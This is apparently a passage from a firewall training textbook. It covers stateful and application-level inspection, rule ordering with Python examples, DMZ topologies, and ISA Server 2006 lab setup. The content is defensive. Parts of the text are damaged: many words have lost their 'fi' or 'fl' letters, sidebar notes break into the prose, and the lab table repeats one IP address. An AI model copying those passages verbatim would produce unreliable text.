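        stale = [k for k, seen in self.table.items() if now - seen > self.timeout]
        for k in stale:
            del self.table[k]

    def outbound(self, proto, src, sport, dst, dport, now):
        """Packet from the protected zone: pass it and remember the flow."""
        self._expire(now)
        self.table[(proto, src, sport, dst, dport)] = now
        return "ACCEPT"

    def inbound(self, proto, src, sport, dst, dport, now):
        """Packet from the untrusted zone: only an established flow passes.
        The key is flipped so the inside host comes first, matching the
        entry created by the outbound packet."""
        self._expire(now)
        key = (proto, dst, dport, src, sport)
        if key in self.table:
            self.table[key] = now          # refresh idle timer
            return "ACCEPT"
        return "DROP"                      # unsolicited: silent discard ("black hole")

    def active_connections(self):
        return len(self.table)


# Constructed trace: (direction, proto, src, sport, dst, dport, time)
TRACE = [
    ("out", "tcp", "10.0.0.5", 51000, "198.51.100.7", 443, 0),    # inside opens HTTPS
    ("in",  "tcp", "198.51.100.7", 443, "10.0.0.5", 51000, 1),    # reply: established
    ("in",  "tcp", "198.51.100.7", 443, "10.0.0.5", 51001, 1),    # wrong client port
    ("in",  "tcp", "203.0.113.9", 443, "10.0.0.5", 51000, 2),     # spoofed peer address
    ("in",  "tcp", "198.51.100.7", 22, "10.0.0.5", 22, 3),        # unsolicited scan
    ("in",  "tcp", "198.51.100.7", 443, "10.0.0.5", 51000, 250),  # keepalive refreshes
    ("in",  "tcp", "198.51.100.7", 443, "10.0.0.5", 51000, 600),  # idle > timeout: gone
]


def run_trace(trace, timeout=IDLE_TIMEOUT):
    """Feed the trace through a fresh filter and return the list of verdicts."""
    fw = StatefulFilter(timeout)
    verdicts = []
    for direction, proto, src, sport, dst, dport, t in trace:
        handler = fw.outbound if direction == "out" else fw.inbound
        verdicts.append(handler(proto, src, sport, dst, dport, t))
    return verdicts


if __name__ == "__main__":
    print(run_trace(TRACE))
    # ['ACCEPT', 'ACCEPT', 'DROP', 'DROP', 'DROP', 'ACCEPT', 'DROP']
```

The point to notice is the last two packets: the keepalive at t=250 keeps the entry alive, but after 350 seconds of silence the same peer is treated as an unsolicited stranger again. A real implementation also checks TCP flags and sequence windows; this example tracks only the address and port tuple.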
Application Level Firewalls
Application level firewalls (also called application-proxy gateways) are sophisticated firewalls that combine the lower-layer access controls with inspection at Layer 7 of the OSI model (the Application Layer). They control the passage of packets between the trusted and untrusted zones configured on the firewall according to which application or service is sending or receiving the data. All network data that passes through the firewall does so under the control of the application-proxy software, which terminates the client's connection and opens its own connection to the server.
Figure 5-9: OSI Layers of inspection for an Application Level Firewall.
Application level firewalls can perform deep packet inspection in order to make accurate decisions about which connections to allow and which to deny. By reading the actual data inside a packet, an application level firewall can detect bypass attempts such as hiding non-permitted communication inside packets sent over permitted ports, for example, tunnelling IRC traffic over port 80 to masquerade as HTTP. A traditional stateful firewall cannot detect this, whereas an application level firewall can inspect the stream and deny it when the content does not match the protocol expected on that port.
Application level firewalls also generally have the ability to require authentication of each user or system attempting to send data across the firewall. A wide variety of authentication forms are available, including:
User ID and Password Authentication
Hardware or Software Token Authentication
Source Address Authentication
Biometric Authentication
Application level firewalls have several advantages over both types of lower-level packet filter firewall examined previously.
Extensive Logging Capabilities: Application level firewalls log extensively because they examine the entire packet contents rather than just the lower-level network addresses and ports. Their logs often record the application-specific commands issued over the connection, which is very useful for both policy management and intrusion investigation.
Enforcement of Authentication: The authentication capabilities built into application level firewalls are far superior to those of packet filter or stateful inspection firewalls. They let you enforce whichever types of authentication are most appropriate for your environment instead of relying only on lower-level source, destination, and port addresses.
Less Susceptible to TCP/IP Vulnerabilities: Application level firewalls can inspect the entire contents of a packet to ensure that the contents are appropriate for the target destination, and because the proxy terminates the client's connection and opens a fresh one of its own to the server, malformed or spoofed packets never reach the protected host directly. This greatly improves the firewall's ability to block spoofing attacks and other TCP/IP-level abuses.
The deep packet inspection of an application level firewall can be resource-intensive. Therefore, most application level firewalls also perform stateful inspection to optimize resource utilization.
One potential danger to application level firewalls is that savvy intruders may try to defeat deep inspection by encrypting their traffic, for example by tunnelling through SSL/TLS. An encrypted stream can only be filtered on its outer attributes (addresses, ports, and connection state), not on its content. One response is to deny inbound encrypted sessions unless the connection originated inside the trusted zone and is listed in the state table. Another, where encrypted services must be published, is to terminate the TLS session on the proxy or a reverse proxy so that the plaintext can be inspected before it is forwarded inward. The first approach cannot be applied blindly to a public HTTPS server, since it would block every legitimate visitor; such servers must be exempted by explicit rule or placed behind a TLS-terminating proxy.
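As an added example (not code from the book) covering both the port-80 masquerading case and the encryption caveat above, here is the kind of first-bytes check an application-aware firewall applies to a stream arriving on TCP port 80. The request-line pattern follows RFC 7230, the TLS check is the standard record-header test, and the sample payloads are constructed.

```python
"""Application-layer inspection of a stream arriving on TCP port 80 (added
example, not the book's code).

A packet filter sees only "tcp, dport 80".  An application-level firewall
reads the first bytes of the stream and decides whether they really are an
HTTP request.  The samples below are constructed; the TLS detection is the
standard record header check (content type 0x16 = handshake, version 3.x).
"""
import re

HTTP_METHODS = (b"GET", b"HEAD", b"POST", b"PUT", b"DELETE",
                b"OPTIONS", b"PATCH", b"TRACE", b"CONNECT")

# Request line per RFC 7230: METHOD SP request-target SP HTTP/1.x CRLF
REQUEST_LINE = re.compile(
    rb"^(?:" + b"|".join(HTTP_METHODS) + rb") \S+ HTTP/1\.[01]\r\n")


def classify_port80(payload: bytes) -> str:
    """Return HTTP, TLS or OTHER for the first bytes seen on the connection."""
    if (len(payload) >= 3 and payload[0] == 0x16
            and payload[1] == 0x03 and payload[2] <= 0x04):
        return "TLS"          # encrypted: contents cannot be inspected here
    if REQUEST_LINE.match(payload):
        return "HTTP"
    return "OTHER"            # e.g. IRC or a custom tunnel riding on port 80


def decide(payload: bytes, allow_tls_on_80: bool = False) -> str:
    """Verdict for an inbound stream on port 80.  TLS on port 80 is not a
    normal web deployment, so the default is to drop it; set
    allow_tls_on_80 if your policy chooses to pass what it cannot read."""
    verdict = classify_port80(payload)
    if verdict == "HTTP":
        return "ACCEPT"
    if verdict == "TLS" and allow_tls_on_80:
        return "ACCEPT"
    return "DROP"


# Constructed samples of what the first segment on port 80 might carry.
SAMPLES = {
    "browser": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "irc":     b"NICK bot\r\nUSER bot 0 * :bot\r\nJOIN #chat\r\n",
    "tls":     b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03",
    "garbage": b"GET /not-quite-http",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify_port80(data), decide(data))
```

A production proxy buffers until the request line is complete before deciding, which is why the truncated "garbage" sample is classed as OTHER here rather than HTTP; it also goes on to validate headers and methods against policy, whereas this example stops at the request line.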
Building Firewall Rules to Control Network Communications
We have seen that modern firewalls can control network traffic based on a wide range of packet or application attributes drawn from the layers discussed previously. When a packet arrives, the firewall reads the attributes it acquired as it passed through the various networking layers and compares them with the rules configured on the firewall. Based on the outcome of that comparison, the packet is handled in one of the following ways.
Accept: The firewall passes the packet through to the destination requested by the packet.
Deny: The firewall drops the packet without passing it through, and returns an error message to the source address (for TCP typically a RST, for other protocols an ICMP unreachable). Many products call this action "reject".
Discard: The firewall drops the packet silently, without returning an error to the source. This creates the appearance that the firewall is not even on the network; it is often called a black hole because it does not reveal its presence through error messages. Many products call this action "drop".
A partial list of attributes that a firewall can examine and use for rule comparison looks like this:
Source address
Destination address
Protocol
Source port
Destination port
Source service
Destination service
TTL values
Originator's netblock
Destination netblock
Domain name of the source
Domain name of the destination
Application source
Application destination
Authentication
And many other attributes
Firewall rules are the heart of your firewall system. Rules build on one another and are generally parsed in sequence: the first rule whose criteria match the attributes of the packet is the rule that is applied, and no later rule is consulted. Most firewalls have configuration options that let you control the order in which rules within a given rule set are parsed.
Ordering your rule sets correctly is an important step in ensuring that the firewall behaves as expected. Look at the following figure and find rule number seven, the default deny rule. It is the last rule in the set. If it were placed anywhere but last, every rule below it would have no effect, because this rule denies all traffic before they are ever consulted. Without careful ordering of your rules, you will find your firewall producing unexpected results. One thing you can count on is that a firewall will do exactly what you tell it to do. A wise firewall administrator plans his or her rules carefully and keeps them well documented.
Figure 5-10: Example firewall rule set.
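The following added example (Python, not the book's code and not the rule set in Figure 5-10) serves both the simple packet filter section and the rule-ordering discussion above. It implements a stateless first-match filter over the address, protocol, port and interface attributes, with the Accept, Deny (REJECT) and Discard (DROP) actions; a shadowing check that flags rules an earlier rule makes unreachable, which is exactly what catches a misplaced default deny; and an exposure count that shows how large the attack surface becomes when a stateless filter opens every port above 1023 for return traffic. The rule set, interface names and addresses are constructed.

```python
"""Stateless, first-match packet filter (added example, not the book's code).

Rules and packets are dicts over the attributes the chapter names as the
building blocks of firewall rules, plus the interface a packet arrived on.
A rule field of "*" is a wildcard and a (low, high) tuple is an inclusive
port range.  Actions follow the chapter's vocabulary: ACCEPT, REJECT (deny
with an error returned to the sender) and DROP (silent discard).
"""

FIELDS = ("iface", "proto", "src", "dst", "sport", "dport")


def make_rule(action, **fields):
    """Build a rule; any field not supplied is a wildcard."""
    rule = {f: "*" for f in FIELDS}
    rule.update(fields)
    rule["action"] = action
    return rule


def field_matches(pattern, value):
    """Match one field: wildcard, exact value, or inclusive port range."""
    if pattern == "*":
        return True
    if isinstance(pattern, tuple):
        return pattern[0] <= value <= pattern[1]
    return pattern == value


def evaluate(rules, packet, default="DROP"):
    """Walk the rule set in order; return (action, index) of the first match,
    or (default, None) when nothing matches (an implicit default deny)."""
    for i, rule in enumerate(rules):
        if all(field_matches(rule[f], packet[f]) for f in FIELDS):
            return rule["action"], i
    return default, None


def covers(earlier, later):
    """True when every packet that matches `later` also matches `earlier`,
    i.e. `later` can never fire if it sits below `earlier`."""
    for f in FIELDS:
        e, l = earlier[f], later[f]
        if e == "*":
            continue                      # earlier accepts anything here
        if isinstance(e, tuple):
            if isinstance(l, tuple):
                if not (e[0] <= l[0] and l[1] <= e[1]):
                    return False          # later range sticks out of earlier
            elif l == "*" or not field_matches(e, l):
                return False
        elif e != l:
            return False                  # exact value differs or later is wider
    return True


def shadowed_rules(rules):
    """Indices of rules that can never match because an earlier rule covers
    them: the check that catches a default-deny rule placed too early."""
    return [j for j in range(len(rules))
            if any(covers(rules[i], rules[j]) for i in range(j))]


def inbound_exposure(rules, dst, proto="tcp", iface="ext"):
    """Count destination ports on `dst` that an outside host can reach, by
    evaluating one constructed probe packet per port."""
    probe = {"iface": iface, "proto": proto, "src": "198.51.100.7",
             "dst": dst, "sport": 40000, "dport": 0}
    count = 0
    for port in range(1, 65536):
        probe["dport"] = port
        if evaluate(rules, probe)[0] == "ACCEPT":
            count += 1
    return count


# Constructed rule set for a single perimeter firewall: "ext" is the untrusted
# interface, "int" the protected one, 203.0.113.10 a published web server and
# 10.0.0.5 an ordinary internal host (all addresses are documentation ranges).
RULES = [
    make_rule("ACCEPT", iface="ext", proto="tcp", dst="203.0.113.10", dport=80),
    make_rule("ACCEPT", iface="ext", proto="tcp", dst="203.0.113.10", dport=443),
    make_rule("REJECT", iface="ext", proto="tcp", dport=23),
    make_rule("ACCEPT", iface="int", proto="tcp"),
    # The simple-packet-filter compromise: let replies back in by opening
    # every port above 1023 from the outside.
    make_rule("ACCEPT", iface="ext", proto="tcp", dport=(1024, 65535)),
    make_rule("DROP"),                          # default deny: must stay last
]

# The same rules with the default deny accidentally moved to the top.
MISORDERED = [RULES[-1]] + RULES[:-1]

if __name__ == "__main__":
    syn = {"iface": "ext", "proto": "tcp", "src": "198.51.100.7",
           "dst": "203.0.113.10", "sport": 40000, "dport": 80}
    print(evaluate(RULES, syn))                 # ('ACCEPT', 0)
    print(shadowed_rules(MISORDERED))           # [1, 2, 3, 4, 5]
    print(inbound_exposure(RULES, "10.0.0.5"))  # 64512
```

Two things are worth running for yourself: shadowed_rules on your own rule sets before deployment (any index it returns is a rule the firewall will never apply), and inbound_exposure against an internal host, which reports 64512 reachable ports for this rule set. That number is the "large attack surface" of the stateless design, and it is what the stateful filter's dynamic return-port handling removes.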
Common Firewall Topologies
Firewalls can be configured in a variety of topologies to meet the needs of any size or style of network environment. Three standard firewall topologies are commonly used in modern networks, each suited to a specific kind of environment. Choosing the correct topology for your network is the first step in implementing a firewall successfully.
We have seen that firewalls enforce access controls between systems or network segments that connect across zones with differing levels of trust. It should not be surprising, therefore, to find a firewall at each point where different trust zones connect in the common topologies.
Perimeter Firewall: The perimeter firewall topology (also referred to as an edge or screened configuration; the single hardened firewall host is sometimes called a bastion host) is the most common firewall topology. It places a single firewall directly between the trusted and untrusted systems or networks.
Figure 5-11: Example of a perimeter firewall topology.
A perimeter firewall is the simplest configuration to use when no trusted resources need to be reachable from the untrusted network. One exception is remote users; in that case the firewall is often combined with VPN technology so that external users can securely access the internal network. This topology is a good choice when you want to allow access to the Internet from your trusted network but do not wish to make internal resources available to users on the Internet.
You can configure a perimeter firewall to allow access to specific internal resources by writing rules that permit outside access to only those resources, such as an SMTP server or web server; many people do exactly that. Be aware, however, that if such an internal resource is compromised through the port you exposed, the attacker is already inside your trusted network and can attack everything else on it. If you need to make resources available to users on untrusted networks, the better choice is one of the following DMZ configurations.
Three-Legged (DMZ) Firewall Topology: The three-legged DMZ topology is commonly used where you need to publish resources to an untrusted network such as the Internet. Like the perimeter topology it uses a single firewall, but here the firewall has an additional network interface connected to a network containing the externally available resources.
Figure 5-12: Example of a three-legged (DMZ) firewall topology.
The three-legged topology allows you to publish resources while still blocking all inbound access to your internal network. The firewall rules are configured differently for the internal and DMZ interfaces: the internal interface denies external access to the internal network, while the DMZ interface allows access from the external network to specific resources in the DMZ.
This configuration improves the security posture of your internal network by removing the need to open any inbound ports to it other than for client return connections. A further benefit is that if one of the publicly accessible resources is compromised, the attacker is still outside the internal network and is held to whatever the DMZ-to-internal rules permit. That protection is only as good as those rules, so allow DMZ hosts to reach only the specific internal services they genuinely need, and log what they attempt.
Chained (DMZ) Firewall Topology: Another DMZ topology commonly used where you need to publish resources to an untrusted network such as the Internet is the chained DMZ. It uses a pair of firewalls that sandwich the DMZ between the internal and external networks. Since there are two firewalls and therefore two sets of firewall rules, it can be considerably more complex to set up. However, when correctly configured, this topology brings a high level of protection to your network.
Figure 5-13: Example of a chained (DMZ) firewall topology.
This topology is commonly used where both the external and the internal network need access to resources in the DMZ, and those DMZ resources in turn need to communicate with servers and services that reside inside the internal network.
A good example is a mail server that must exchange inbound and outbound SMTP traffic with the Internet and must also authenticate internal users against a directory service on a server in the internal network.
Another situation where this topology is appropriate is an e-commerce site that connects to a database containing sensitive customer information. Here you place the front-end web server in the DMZ behind the front-side firewall and the database server on the segment behind the back-side firewall. The front-side firewall rules allow inbound TCP ports 80 and 443 to the web server only, while the back-side firewall rules allow only the web server to query the back-end database server, on the database port alone, effectively isolating the database server from the Internet.
When correctly configured, the chained DMZ topology offers a high level of protection from external access while providing ample flexibility for communication between the DMZ and the internal network.
Why Would I Want a Firewall on My Network?
The Wild Frontier
The Internet is sometimes referred to as the new frontier. And like any frontier setting, it has its share of undesirable elements. Out on the frontier, the only safety you can count on is the safety you create for yourself. Placing a firewall on your network is like the old-time explorers building a fort for protection. It does not guarantee total immunity, but it provides much more safety than a canvas tent when danger approaches.
Like the frontier, the Internet is lled with opportunity. This includes the opportu-
nity to carry out business, to learn, grow, discover, and connect with new people.
But close on the heels of frontier-style opportunity come the scavengers and
villains. Almost any day, in almost any media you care to name, you will nd a
new report about some digital danger that has reared its ugly head on the
Internet.
The net is a representation of society in all its glory and disgrace. From nuisance hackers to serious criminals, the complete gamut of less than well-adjusted members of society can be found. In our normal lives, we install locks on our houses and employ police forces to deter would-be vandals and thieves from taking or damaging our property. Firewalls fulfill this role on our networks. If you don't protect it, you won't own it for long.
Regulatory Compliance
The prominence of Internet dangers has even prompted legislation in many coun-
tries that places responsibilities for data protection on the organization that owns
the information. This is especially true of government, banking, and the
healthcare industries. Organizations now nd themselves with compliance respon-
sibilities for protecting sensitive data that sometimes carry stiff penalties for non-
compliance.
This has spawned a general move in most organizations toward a formal set of computing security policies. These policies dictate how an organization's resources must be protected and demonstrate that it is meeting regulatory compliance. A firewall is one of the key elements in enforcing the organization's written policy.
Public Image
A firewall can serve to protect not only your organization's data but also its public image. Almost every organization has a website today. If these publicly accessible resources are not protected and get hacked, whether through defacement or denial of service, the organization's image is tarnished in the eyes of its users.
This impact can, and usually does, reach the organization's bottom line, either through customers going to the competition because they lost trust in your organization after a website defacement or data theft, or through lost sales during a denial of service attack on your e-commerce site. Firewalls can't always prevent this, but they can reduce the danger to an acceptable level of risk.
What Can a Firewall Not Protect You From?
A firewall is a powerful tool in your security toolbox, but there are certain dangers a firewall can do nothing about. Because the purpose of a firewall is to control and limit inbound and outbound communication between networks or systems of differing trust levels, it follows that it cannot protect against attacks that don't traverse it. The following is a partial list of things a firewall cannot protect you from:
Firewalls cannot protect against internal threats: These threats originate in the same zone of trust as their target. They include:
Disgruntled or unscrupulous workers. This is one of the greatest dangers to any network and a frequent source of actual intrusions.
Weak password policies or other poor system administration practices. A firewall will not be very effective at securing something that has gaping security holes to begin with. Follow industry-standard best practices throughout your network environment.
Firewalls cannot protect against attacks that don't traverse the firewall:
Personal modem or wireless connections. This issue has grown into a real danger in the era of mobile wireless Internet access. A mobile user who attaches a laptop to your trusted network and then connects to the Internet over a 3G/GSM cellular, satellite, or other wireless link has effectively punched a hole right through your carefully configured security measures.
Social engineering. This is a proven method of breaking into otherwise well-secured networks. It is astounding what a skilled social engineer can get a user (or even a system administrator), who is otherwise an intelligent human being, to reveal about his or her computing environment. Your best line of defense against this type of attack is user education.
Cannot protect against attacks on services that are allowed through your
rewall:
Allowed inbound traffc. This would include attacks on web and email
services that external access to has been permitted to. If you allow
access to your web server through the rewall, and the web server has
an un-patched vulnerability that works over port 80 (http), your rewall
cannot protect the web server from that type of attack.
Malware and browser threats. Firewalls cannot protect your network
against threats that the user brings into the network themselves. This
includes the many forms of malware such as email viruses, Trojans,
browser-based attacks, spyware, and phishing sites. Again, we are back
to defense in depth and user education as our best defense against these
types of threats.
To have the best chance at defending your network, a well-congured rewall
must be augmented by good conguration control, secure OS baselines, patch
management, anti-malware programs, sound network administration basics, and a
user education program. Defense in depth is the security-conscious administrators
motto.
Things to Consider About Firewall Implementation
Before we move on to the next topic, lets discuss a few simple concepts con-
cerning the real world implementation of a rewall in your network. If you keep
these concepts in mind when you work with an organizations rewall, you will
enjoy greater success in securing the network, while keeping management and
your users content and supportive.
Firewalls are an Enforcement Tool for Security Policies
A rewall enforces your inter-network access security policy. If you didnt have
an access security policy before you put the rewall in place, you do now. It may
not be a written policy, but effectively its still an access security policy. If you
havent made explicit decisions about what you want your inter-network access
security policy to be, you will likely wind up with less than optimal congura-
tions on your rewall, and it will certainly be more difficult for you to maintain
its effectiveness over time. In order to have an effective rewall, you really do
need a good security policyone that is well thought out, written down, and
widely agreed to and supported within your organization.
It is almost axiomatic in the security eld that if you do not have published, for-
mal, written security policies that have received full management approval and
support, implementing a rewall will max your job pain threshold. This is prima-
rily because your users (and management) will not understand why the network
doesnt work like it used to and the ill will and blame will wind up on your
door step. Before implementing the rewall, you should have created a written
Some modern application
layer rewalls capable of
deep packet inspection also
have varying levels of
intrusion detection
capabilities built in. These
rewalls can potentially
mitigate this type of risk. But
better safe than sorry. Patch,
Patch, Patch!
Some modern application
layer rewalls capable of
deep packet inspection also
have varying levels of
malware detection
capabilities built in. These
rewalls can potentially
mitigate this type of risk. But
again, better safe than sorry.
Always use anti-malware
software and keep it up-to-
date!
Lesson 5: Conguring Firewalls 207
policy that explicitly outlines your overall security goals, policies, and procedures
including your rewall conguration and rule sets. Obtaining management sup-
port and backing for the policy is critical, as they are the ones with the nal
authority and responsibility for the organizations operations and information.
A Firewall by Itself is Not a Security Solution
Firewalls can only protect networks and information from certain types of digital dangers. They are designed to control and limit external access to resources. Firewalls can only protect you against threats they can detect, and unfortunately there are no magical all-seeing firewalls. Also, a firewall cannot protect against internal attacks against your network or data. To gain maximum effect, your firewall should be just one layer in a comprehensive defense in depth security program. Remember that an attacker doesn't often go through security but looks for ways to go around it! Make it difficult by having more than one layer of defense.
Use a Deny All, Permit by Exception Approach
This is a tried and true approach to configuring firewalls safely. If you deny everything and only allow what you know to be secure or mandatory, you will spend much less time reconfiguring the firewall or responding to intrusions. New vulnerabilities continually pop up in the digital world; the "permit all, deny what is dangerous" approach means you will have a constant battle to keep up. The "permit all, deny dangerous" methodology would only work if you knew every danger: past, present, and future. This is just not a realistic approach to security.
Enforce the Least Privilege Rule
This is a basic axiom of all forms of security, regardless of whether it is physical security; user accounts; file, share, and application permissions; or firewall traversal access. You should only grant users, systems, and applications the least amount of privilege or access that they require to carry out their functions. Be leery of anything that requires high levels of privilege or access to function. You can only empty the vault if you have access and the keys.
Be Gracious, but Not Compliant
Enforcing security and dealing with user requests is a delicate balancing act with a little public relations magic sprinkled in. This is especially true if you are trying to secure a network that has been insecure before. Some people will simply not care whether what they do creates security risks if it makes their life more convenient. If you open up the firewall a little more at every user's request, you will wind up with a wide open network in the end. At the same time, if you always deny requests, people will turn bitter. It is a simple fact of life that people who feel they can't work with you will find a way to work around you.
Security is always a tradeoff against convenience. It is not convenient to have to reach into your pocket to get your house keys to unlock the house when your arms are full of grocery bags after you arrive home from the market. However, we tolerate this inconvenience because we value the items in our house. User education and gracious manners when you deal with users will go a long way toward meeting their needs while keeping the network risks at an acceptable level. Remember, the network is there to meet the business needs of the organization, not because the organization needs a secure data vault. You need to find ways to meet the users' needs while controlling the risks.
Firewalls Are Not Just Perimeter Protection
Last, but certainly not least, expand your view of what firewalls can be used for. In general, we think of firewalls in the context of perimeter protection when connecting to external networks. However, this is a very limited view of a firewall's usefulness in a modern networked environment. It is becoming more and more common for organizations to employ additional firewalls within their internal networks (intranet) to control data flow and protect critical resources or information from unauthorized internal access. For example, an organization might employ an internal firewall to provide an additional layer of security for its financial or human resources information.
Examine the following figure and notice the network segments the internal firewall is placed between.
Figure 5-14: Using an internal firewall to secure sensitive internal resources.
In this context, the firewalls are not only controlling access from the external network, the DMZ, and the partner networks, but also from within the organization's internal network itself. Employing firewalls in this manner can significantly increase the security of your sensitive data against internal attacks.
Topic 5B
Configuring Microsoft ISA Server 2006
Introduction to ISA Server 2006
Microsoft's Internet Security and Acceleration Server (ISA) 2006 is what Microsoft calls its integrated edge security gateway. Microsoft's security offerings in the firewall arena have come a long way since its release of Proxy Server 2.0, which had firewall style features. This continued development has resulted in ISA Server 2006 being a robust and mature multilayer firewall. It has a wide range of features and capabilities that will meet the needs of almost any network environment: from small businesses to global enterprises. ISA Server 2006 features the following functionalities:
• Internet Access Control (Proxy)
• Flexible Configuration Controls Including Easy-to-use Wizards
• Configuration Export/Import to XML
• Customizable Protocol Definitions
• Secure Application Publishing
  • Server Publishing
  • Web Publishing
  • SharePoint Publishing
  • SSL Bridging
• Application Layer Filtering (Deep Packet Inspection)
• Intrusion Detection Capabilities
• Flood Resiliency Configuration
• Forward and Reverse Web Caching
• Remote User or Branch Office VPN Capability
Common Deployment Scenarios for ISA Server 2006
Networking professionals around the world have had long-standing concerns about performance impact, operational costs, and manageability whenever they deploy a new technology on their networks. This is especially true when you need to deploy a firewall for security purposes. Microsoft spent considerable research effort to discover what the real pain points are when deploying a firewall solution. Fortunately, the ISA Server 2006 design team was the recipient of all this research. Their efforts at making ISA Server 2006 highly deployable in the most common scenarios are evident. They targeted their efforts to make ISA Server 2006 very straightforward to deploy in several common scenarios:
• Protecting your network against external and internal Internet-based threats.
• Publishing content to external consumers in a secure fashion.
• Securely connecting remote branch offices.
• Providing secure access to remote users of the internal network.
In each one of these scenarios, ISA Server 2006 provides a robust solution with streamlined deployment, configuration, management, and reporting.
Protecting Your Network Against External and Internal Internet-Based Threats
Organizations can use ISA Server 2006 to mitigate or eliminate damage to their network resources from the Internet, including unauthorized access and even malware attacks, by using the full-featured suite of tools in ISA Server 2006 to inspect for and block harmful network traffic and content.
With its hybrid firewall-proxy architecture, application-level deep content packet inspection, granular security policies, and comprehensive monitoring and alerting capabilities, ISA Server 2006 makes it easier to protect and manage your connected network resources. Some of the features that enable ISA Server 2006 to protect your network are:
• Simplified management tools: ISA Server 2006 has a suite of management tools that simplify configuration and ongoing administration. As firewall tools go, these tools are relatively intuitive and have a very low learning curve.
• Multilayer deep content inspection: ISA Server 2006 has a comprehensive set of customizable policies, customizable protocol filters, and network topology relationship models that allow you to thoroughly inspect and control the traffic that traverses the firewall.
• Flood resiliency: ISA Server 2006 now features enhanced flood resiliency for network event handling and monitoring. This feature provides a more robust firewall resistance to threats such as denial of service and/or distributed denial of service attacks.
• Unified management and monitoring with MOM: For those organizations that have deployed the Management Pack for Microsoft Operations Manager, ISA Server 2006 can be integrated into your enterprise- and array-level policies. This gives administrators the ability to easily control security and ISA access rules throughout the organization.
• Enhanced worm resiliency: ISA Server 2006 can help to mitigate the overall damage an infected computer will have on the network. This is accomplished through client IP alert pooling and connection quotas that monitor and block unusual connection patterns.
• Quicker attack response times: ISA Server 2006 has a comprehensive set of alert triggers with configurable responses. When configured, this can quickly notify you of network threats targeted against your network.
• Extensive software developer's kit (SDK): The ISA Server 2006 SDK aids third parties in the development of ISA Server 2006 add-ons. These add-ons enrich the feature set of ISA Server 2006 by providing a wide range of additional protections such as anti-virus or custom web filtering controls.
• Improved resource management: ISA Server 2006 gives you extensive log throttling, control of memory consumption, and control of pending DNS queries. This improved resource management contributes to ISA Server's greater overall performance levels.
Versions of ISA Server 2006
Before you deploy ISA Server 2006, you will need to decide which version to purchase. ISA Server 2006 is available in two versions: Standard and Enterprise. You should install the version that is appropriate for your network environment and security needs. A short comparison of the two versions follows:
Figure 5-15: ISA Server 2006 version comparison chart.
Note: Several manufacturers such as HP, Avantis, Whale, Celestix, SecureGUARD, and OSST now offer ISA Server 2006 in a firewall appliance. This combines the power and configuration ease of ISA Server and the convenience of an appliance.
TASK 5B-1
Preparing for the ISA Server 2006 Setup: Lab Prerequisites
Task Note: Firewalls are primarily designed to control network traffic between network segments, so you will need to have more than one network adapter in your computer in order to configure ISA Server 2006 in the most common firewall topologies. Since the classroom computers have only one physical network card, we will install and configure the Microsoft Loopback Adapter to represent our internal network interface, while configuring the physical network card as our external network interface.
1. Choose Start→Control Panel→Add Hardware.
2. In the Welcome dialog box, click Next. The wizard will search for your hardware.
3. Select Yes, I Have Already Connected The Hardware, then click Next.
4. Scroll to the bottom of the Installed Hardware list box and select Add A New Hardware Device. Then, click Next.
5. Select the Install The Hardware That I Manually Select From A List (Advanced) option, then click Next.
6. Under Common Hardware Types, select Network Adapters, and click Next.
7. Under Manufacturer, select Microsoft.
8. Under Network Adapter, select Microsoft Loopback Adapter.
9. Click Next twice.
10. If prompted, click OK in the Insert Disk dialog box, enter the path to the Windows 2003 Server installation source files in the Files Needed dialog box, and then click OK.
11. Click Finish.
12. Choose Start→Control Panel→Network Connections→Local Area Connection 2.
13. In the Local Area Connection 2 dialog box, click Properties.
14. In the This Connection Uses The Following Items list, select Internet Protocol (TCP/IP) and then click Properties.
15. On the General tab, select Use The Following IP Address and then enter the address from the following table that corresponds to your computer name.
Computer name   Internal IP address     Computer name   Internal IP address
WIN-R01         10.16.1.1/24            WIN-L01         10.18.1.1/24
WIN-R02         10.16.2.1/24            WIN-L02         10.18.2.1/24
WIN-R03         10.16.3.1/24            WIN-L03         10.18.3.1/24
WIN-R04         10.16.4.1/24            WIN-L04         10.18.4.1/24
WIN-R05         10.16.5.1/24            WIN-L05         10.18.5.1/24
WIN-R06         10.16.6.1/24            WIN-L06         10.18.6.1/24
WIN-R07         10.16.7.1/24            WIN-L07         10.18.7.1/24
WIN-R08         10.16.7.1/24            WIN-L08         10.18.8.1/24
Note: The subnet mask is 255.255.255.0 for all these IPs.
16. Leave the DNS value blank and then click OK.
17. Click OK, and close the Local Area Connection 2 Properties window.
18. Choose Start→Control Panel and right-click Network Connections. From the pop-up context menu, choose Open.
19. Right-click the Local Area Connection and choose Rename.
20. Name the connection External.
21. Right-click the Local Area Connection 2 and choose Rename.
22. Name the connection Internal.
23. Close the Network Connections window.
You have now installed the Microsoft loopback adapter and assigned it a unique IP address. We will be using this adapter to function as our internal network adapter for ISA Server 2006. You also renamed the two available network connections so they can easily be identified as either the external or internal networks.
ISA Server Installation Requirements
System Requirements for ISA:
Figure 5-16: ISA Server hardware requirements.
TASK 5B-2
Install Microsoft ISA Server 2006
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous task. This task requires you have the Microsoft ISA Server 2006 software available.
1. Browse to the location of the ISA Server 2006 installation files and double-click isaautorun.exe.
2. Click the Install ISA Server 2006 link.
3. At the Installation Wizard, click Next.
4. Read the License Agreement, select I Accept Terms In The License Agreement, and click Next.
5. In the Customer Information dialog box, enter your name, company, and
license if necessary, and then click Next.
6. In the Setup Type dialog box, select the Typical radio button, then click
Next.
7. In the Internal Network dialog box, click the Add button.
8. In the Addresses dialog box, click the Add Adapter button.
9. In the Select Network Adapters dialog box, check the box next to your
Internal network card, and then click OK.
10. In the Addresses dialog box, click OK.
11. In the Internal Network dialog box, click Next.
12. In the Firewall Clients dialog box, accept the default and click Next. (Do
not check the box to Allow non-encrypted Firewall Client Connections.)
13. Read the Services warning dialog box and then click Next.
14. In the Ready to Install the Program dialog box, click Install. (The Microsoft
ISA Server 2006 - Installation Wizard will start and a File Progress window
will appear. Be patient, it will take several minutes to install all the
components.)
15. In the Installation Wizard Finished dialog box, click Finish.
16. In the pop-up window, click OK. The Windows Internet Explorer window
opens with some information on how to protect ISA. Read the page and
then close the Internet Explorer window.
17. Close the Microsoft ISA Server 2006 Setup dialog. ISA Server 2006 is
now installed.
Configuring ISA Server 2006
